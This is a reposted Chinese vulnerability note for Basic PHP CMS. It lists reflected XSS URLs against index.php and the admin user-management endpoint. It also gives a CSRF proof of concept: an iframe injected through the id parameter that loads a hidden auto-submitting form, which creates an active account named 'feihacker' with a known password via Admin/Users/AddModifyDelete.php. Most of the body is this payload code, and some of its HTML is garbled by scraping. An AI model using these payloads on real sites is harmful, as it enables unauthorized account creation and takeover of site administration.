Basic PHP CMS、BasicCMS xss csrf - 脚本漏洞(Scripts Bugs)

admin

139164
文章

114
评论

2021年4月3日19:38:15评论81 views字数 491阅读1分38秒阅读模式

basiccms 版本不太清楚了

菲哥哥

存在跨站：

http://localhost/basiccms/index.php?id= </p> <p>http://localhost/basiccms/Admin/Users/AddModifyDelete.<a href="http://cn-sec.com/archives/tag/php">php</a>？txtUserID=a&txtUserName=b&txtPassword=c&txtEmail=dqq.com&chkActive=&txtID=0&txtActive=Y&txtView=Active 、 </p> <p>CSRF </p> <p>http://localhost/basiccms/index.php?id=<iframe loading="lazy" width="0" height="0" src="http://localhost/basiccms/CSRF.html"> </p> <p>CSRF 代码 </p> <p>basiccms 菲哥哥 </p> <form action="http://localhost/basiccms/Admin/Users/AddModifyDelete.php" method="post" name="form"><input type="hidden" name="txtUserID" value="feihacker"><br /><input type="hidden" name="txtUserName" value="feihacker"><br /><input type="hidden" name="txtPassword" value="feihacker"><br /><input type="hidden" name="txtEmail" value="xxxx@qq.com"><br /><input type="hidden" name="chkActive"><br /><input type="hidden" name="txtID" value="0"><br /><input type="hidden" name="txtActive" value="Y"><br /><input type="hidden" name="txtView" value="Active"></p> </form> <p>

文章来源于lcx.cc:Basic PHP CMS、BasicCMS xss csrf - 脚本漏洞(Scripts Bugs)

相关推荐: 全球超半数僵尸网络控制中心在美国

2月19日，美国网络安全公司曼迪昂特（Mandiant）仅凭IP地址就发布报告，指责中国军方从事网络间谍活动，引起舆论广泛关注。该报告数据显示，全球僵尸网络的指挥控制中心中有58%的指挥控制中心位于美国境内，9%在德国、7%在法国、7%在荷兰。本报伦敦2月2…

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Basic PHP CMS、BasicCMS xss csrf - 脚本漏洞(Scripts Bugs)

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信